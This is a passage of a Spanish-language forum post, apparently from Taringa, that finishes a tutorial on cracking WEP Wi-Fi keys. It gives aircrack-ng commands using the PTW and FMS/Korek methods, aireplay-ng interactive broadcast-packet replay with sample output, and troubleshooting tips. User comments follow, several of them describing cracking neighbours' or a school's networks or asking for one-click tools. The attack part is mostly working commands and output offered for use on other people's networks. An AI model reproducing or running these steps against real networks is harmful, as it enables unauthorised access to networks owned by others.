aircrack-ng -z -b 00:14:6C:7E:40:80 capture*.cap Donde: ■-z significa que se use el método PTW para obtener más rápido la clave WEP ■capture*.cap selecciona todos los archivos que comienzan por “capture” y con extensión “cap”. ■-b 00:14:6C:7E:40:80 selecciona el punto de acceso en el que estamos interesados Puedes ejecutar aircrack-ng mientras capturas paquetes. En poco tiempo, verás la clave WEP. Usando el método PTW, necesitarás alrededor de 20,000 paquetes de datos para una clave de 64 bit y 40,000 para claves de 128 bit. Recuerda que el métodoPTW solo funciona con paquetes ARP. Como este tutorial solo cubre este tipo de paquetes no tendrás problema ninguno. El otro requerimiento es que has de capturar con airodump archivos *.cap, lo que significa que no puedes usar laopción ”- -ivs”. Si no usas la opción ”-z”, se aplicará el método FMS/Korek. Necesitarás aproximadamente 250,000 IVs para una clave WEP de 64 bit y 1,500,000 IVs para claves de 128 bit. Esto es aproximado y hay muchas variables que influyen en el número de IVs necesarios para obtener la clave WEP. Problemas: ■Algunas veces es recomendable probar varias técnicas para obtener la clave WEP rápidamente. Prueba la opción “-n” para fijar la longitud de la clave (por ejemplo -n 64). Usa “-f” y prueba diferentes “fudge factors”. Usa “-k” y prueba a desabilitar los métodos korek. Solución alternativa Existe un pequeño engaño que simplifica el crackeo de la clave WEP sin clientes. Básicamente consiste en recoger cualquier paquete “broadcast” del punto de acceso y convertirlo para que el punto de acceso genere un nuevo IV. Es importante que tengas en cuenta que si usas este truco, no podrás utilizar la opción ”-z” del método PTW con aircrack-ng. Esto se debe a que el método PTW requiere paquetes arp y de esta forma no los generamos. OK, ahora te estarás preguntando ¿porque no te enseño esta técnica paso a paso?. La razón es que con esta técnica se reenvian todos los paquetes que recibas. Por lo que si recibes un paquete de 1000 byte entonces reenviaras 1000 bytes. Esto reduce de forma muy importante el número de paquetes capturados por segundo. Aunque, como ventaja podemos destacar que es muy simple y muy fácil de hacer. Además puede que tengas suerte y que recibas un paquete muy pequeño para reenviar. En este caso, esta técnica funcionará tan bien como la descrita con anterioridad en este tutorial. Hay que tener en cuenta las mismas consideraciones y realizar con anterioridad una falsa autenticación. Escribe el siguiente comando: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0Donde: ■-2 significa que usamos el modo interactivo para seleccionar el paquete ■-p 0841 fija el “Frame Control” para que parezca que el paquete se está enviando desde un cliente wireless. ■c FF:FF:FF:FF:FF:FF fija la dirección MAC de destino como “broadcast”. Esto se requiere para que el AP reenvie el paquete y así consigamos un nuevo IV. ■-b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso ■-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta y debe coincidir con la utilizada en la falsa autenticacion ■ath0 es el nombre de nuestra interface El sistema nos contestará: Read 698 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:D0:CF:03:34:8C 0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0x0010: 00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.* 0x0020: 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#.. 0x0030: ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_...... 0x0040: 1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg.... 0x0050: f043 09f6 5418 .C..T. Use this packet ? y Escribes “y” para seleccionar el paquete y empezar la inyección. Recuerda, cuanto más pequeño sea el paquete mucho mejor. Al empezar la inyección verás algo como esto: Saving chosen packet in replay_src-0411-145110.cap Sent 10204 packets...(455 pps)Si aun no has iniciado airodump-ng, ejecútalo ahora. Una vez que tengas suficientes IVs, puedes iniciar aircrack-ng e intentar averiguar la clave WEP. Otra variación de este ataque es usar paquetes de una captura anterior. Debes de tener guardados los paquetes enteros, y no solo los IVs. A continuación puedes ver como sería el comando: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -r capture-01.cap ath0Donde ”-r capture-01.cap” es el archivo de una captura anterior. :F = :f no se como se desactiva xD;

Comentarios Destacados

@maseros +7
rodrothc dijo:para q tanta huevada si no ay nada ..el peor posto que salio

Porque si no interesa a nadie para que voy a pegarme la currada, ya ves que solo esta tu comentario y es negativo.
De todas formas no creas que hay un programa mágico que te da la clave, hay que currarlo un poco

77 comentarios - Redes Inalambricas, sacar clave wep

@rodrothc -10
para q tanta huevada si no ay nada ..el peor posto que salio
@maseros +7
rodrothc dijo:para q tanta huevada si no ay nada ..el peor posto que salio

Porque si no interesa a nadie para que voy a pegarme la currada, ya ves que solo esta tu comentario y es negativo.
De todas formas no creas que hay un programa mágico que te da la clave, hay que currarlo un poco
@noknoknok +2
me intereso, pero demasiado avanzado para los qu eno sabemos tanto como vos!! se hace imposible de leer. gracias de todas formas!
@amaxofobia +4
noknoknok dijo:me intereso, pero demasiado avanzado para los qu eno sabemos tanto como vos!! se hace imposible de leer. gracias de todas formas!


Puffff, es lo más básico del mundo... esta gente quiere que todo se lo haga el soft y, además, le prepare una pizza.
Lo mando a favoritos, saludos capo!
@Nukleuz -1
eee medio como que entiendo poco
mejor lo dejo en manos de algun programa amigo
se agradece igual
@leoxxv -1
pese a lo que digan es muy buen aporte...aunque tengo un problema eh estado probando con varias tarjetas linksys wmp54gs belkin rtl8180 y otras pero ninguna me inyecta kisiera saber como usar el Wireshark para probar que tarjeta sirve para la audotoria..o si ay alguna otra manera de saber ya que eh leido que no todas las tarjetas inyectan..gracias ..pdt te daria puntos pero no c como hacerlo y ademas soy nuevo
@Sickie
maseros dijo:Si tienes una tarjeta pci el mejor chip es atheros, si tienes USB las que mejor van son Ralint (Tambien zydas y realtek 8187L).
Normalmente las tarjetas pci que pone que funcionan a 108 MB son atheros

100% Agree es verdad lo que dice el amigo, yo en lo personal no tuve dramas con el back track, pruebenlo
@evilox3 -1
amaxofobia dijo:
noknoknok dijo:me intereso, pero demasiado avanzado para los qu eno sabemos tanto como vos!! se hace imposible de leer. gracias de todas formas!


Puffff, es lo más básico del mundo... esta gente quiere que todo se lo haga el soft y, además, le prepare una pizza.
Lo mando a favoritos, saludos capo!

y si.... y si alguien me esta haciendo un pete mejor
@FAU_21 -1
no tengo link quality por que vos me podes responder ?
@mostrik
hola, tengo un problema, tengo una placa con chipsett atheros AR5B91, pero no consigo los drivers adecuados para ponerla en modo monitor... alguien sabe si los puedo conseguir o simplemente desisto de la busqueda...gracias
@daniel_10_88 +1
Hola Hay alguien q sepa como sabotear WI-MAX, obtener mas velocidad?????
@fjornell
Alguien con un programa que con solo hacerle click desblokee las redes, sino es mucho pedir?
@Asgard87 -1
Esta muy bien lo que explico, es lo mas tecnico que vi hasta ahora y con una explicación bastante implemntada. Parece chino basico para el que no entro nunca en el mundo de redes wifi y la encriptacion, pero si buscan un poco y descargan el WifiSlax 3.1 LiveCD y un manual para usar el aircrack, todo de esto que se kejan arriba alguno de los muchachos se puede solucionar. No es necesario tirar abajo un post porke simplemente no lo entendemos. Ademas deberían tirarse abajo ustedes mismos que no se ponen como para poder entenderlo. En 15 minutos se consigue las clavez wep de la mayoria de los routers. Para los que probaron y no pudieron con realtek, yo porbe con la PCI y la USB chipset rtl8187 y rtl8185 y funcionan a la perfección. Solo descargan los drivers en formato tar.gz y los descargan en el linux que esten usando. Lo levantan y listo. Lo bueno del wifislax es que se puede instalar en la pc y no hay que andar cargado drivers cada vez que entramos. Asi empiezan con los programas a monitoriar y tirar paketes y listo en minutos esta hecho. salu2 amigos y a meterse que no muerde
@whitefang
my buen aporte, pero es verdad que si no sos un poco avanzado en red no tenes la mas puta idea de que mierda habla el post, y cree que lo escribio un cientifico de la NASA
te dejaria 10 pero no me quedan si puedo paso mañana.
@pap1rr1n
MAN ALGO MAS SIMPLLE PLS
@Leandrodiel
muy bueno y bastante bien explicado
@Wuichuri
es mucho rollo, es mas facil con Wifi Way,,, y la sakas en 40 minutos aircrack-ng captura-01.cap

elejimos numero el numero de nuestra red ke atakamos, ejemplo: 1 y enter

KEY FOUND! [00:11:22:33:44]

o en windows con el Commview for wiffi, la sacas muy bien:
Ejecutar: cmd
escribir
cd c:\hack\win32
aircrack
3: aki la mac
2: aki el sifrado
1: aki el nombre del archivo cap
0: buscar la clave....

y en 0.00segundos

Key Foun! [00:11:22:33:44]


para mi gusto, prefiero hacerlo con Wifi Way, y Windows

pero = buen post, aunke dudo ke seas el autor
pero dale las gracias de parte de todos los taringeros
@Christaring
La verdad, con esto me doy cuenta que no se nada.
@CTMTHEWF
YO LOPUEDO HACEREN SEGUNDOS SIN AIR CRAC NI CAMBIAR A LINUX JAJAJAJA
DENCE UNA VUELTA Ahttp://www.taringa.net/posts/links/4694172/como-crackear-cifrado-wep-seguridad-en-redes-wifi.html
@yatusabe3333
me gusto mucho tu post esta bien detallado, no agas caso de malos comentarios, pues se cree q es facil crakear el cifrado wep y ya yo e crakiado redes y puedo desir q me tomo mucho tiempo aprender desde cero algo de lo tan extenso q es todo esto e dedicado muchismas horas navegando y buscando info en fin te tengo una pregunta talves puedas responderme.

cuando el (essd) de una red no es el modelo del rauter sino un nombre q se lo pusieron x ej: en ves de ser infinitun5881 o Thomson5418, es teddy como mencionaste antes todo bien pero cuando el (essd) es compuesto de dos nombres el aireplay-ng no acepta espacio en medio si fuera (teddy gracioso) da error y no me deja autenticarme y por ende no puedo subir la velocidad de la captura de paketes inyectando mas, cual seria la forma del atake? e tratado kitando el espacio de en medio o poniendo -/ 0 = . ( y no acepta nada no se autentica.
@sweeth_tooth
carnal te la rifaste ojala lo hubiera visto antes desde hace un año he estado aprendiendo como crakear routers y hasta ahorita no ay ninguno que se me interponga XDD bueno esto ya para mi es lo mas comun, en realidad no lo hago por brincarme la seguridad pero en la school me obligaron a aprender ya que no querian compartir la señal XDDDD asi que me puse a investigar un poco y encon trre toda tu info pero en pedazos XDDDD y poco a poco aprendi gracias por el aporte ya lo lei y todo esto ya loo se hacer y me gusto las definiciones que dditse al principio muy completo tu post en realidad no es la gran ciencia pero cuando eres totalmente nuevo y ves esas palabras dices ay cabron y esto que es? solo basta por comenzar a seguir el instructivo y ya no es el fin del mundo XDDDD

saludos!!!!!!!!
@smhy
Tam bien explicado no se como algunos se atreven a decir ¡No entiendo..¡
sigue asi buen post
@wakalaa -3
so so so so boring mi kerido amigo, la neta esta mas chido reventarse un libro de harry potter en aleman
@Davii09 -1
capas q me leo todo . jaja
@cdg752009 -2
Alguien sabe si hay alguna manera de como hacer cuando te queres conectar via Wi Fi desde el celular y te aparece WLAN oculto y te pide la clave pero no la tenes. Gracias
@celt81
Excelente Post... tengo una duda, si recibo un deathentication packet, significa que no estoy asociado???, quiere decir que ya no puedo hacer nada??? existe alguna solucion a este inconveniente. muchas gracias.
@dron173
PORFAVOR AYUDAAAAAAAAAAAAAAAAAA................MIRA TENGO UNA DS LITE Y UN ROUTER INALAMBRICO.....YA BUENO...TRATO DE CONECTARSE Y ME DICE &quot;LA CONFIGURACION DE SEGURIDAD DE ESTE PUNTO DE ACCESO NO ES COMPATIBLE CON LA CONSOLA NINTENDO DS. OTEN AYUDA EN EL SITIO WEB WWW.NINTENDOWIFI.COM.&quot; PORFAVOR AYUDAME KE KIERO JUGAR CON ALGUN CHINO.....ANTES ME DIJIERON ALGO DE UNA CLAVE WAP O WEP NOCE COMO ERA PERO NO ENTIENDO KE ES ESO SI ME PODRIAS DECIR PROFAVORRRRRRR ME ENVIAS UN MENSAJE O COMENTAS AKI MISMO GRACIAS!!!
@kraken_rap
MEJOR PASAN POR ALGUNOS DE MIS POST ME DEJAN 10 PUNTOS Y UN MENSAJE CON SU MSN Y UN MP Y DE HAY YO LES ENSEÑO COMO HACER EN MENOS DE 10 MINUTOS Y FACIL SOLO CON UNOS COMANDOS SIMBOLO DEL SISTEMA ES FACIL
@pinty_1023
lo de la wep la unica q se me resiste es la ska !tu as craqueado alguna ?por lo del post pues muy bueno aunque aqui alla siempre alguno q..... mejor no hablar de ellos pues bueno yo te felicito por tu curro y pasa de los putos argentinos jeejejj
siento no poderte dar puntos pues soy novato bye
@gomarsa
muchas gracias. Me ha servido de mucho
@aquosoft
Es mas dificil que volar un 737 en pedo.
@TAITA79
MUY BUENA INFORMACION MUY COMPLETA

PERO EN LO PERSONAL QUE WEVA O_o
@iker1337
muchas gracias, era precisamente lo que buscaba, para poder generar ARP en una red que no eh podido romper hace tiempo.
@ladinofranz
buena info..... te doy lo q mereces....
un 10.......................................................................................................
@pirataleg
recontra muy buena info ¡ +5
@peznovuela
Escribir un comentario...e gusta tu post pero lo leo y no identifico los diferentes ataques o mas bieno. no encuentro nisiquiera el final. lo que pasa es que quiero otros ataques ya que el ataque 1 y 3 no me funcionan. y al tuyo no le entiendo...
@megavicion
amigo una consulta tengo una clave wep pero la coloco y no puedo conectarme solamente las wap2 uso xp que sera tengo una tarjeta encore super g 108 mps pci enlwi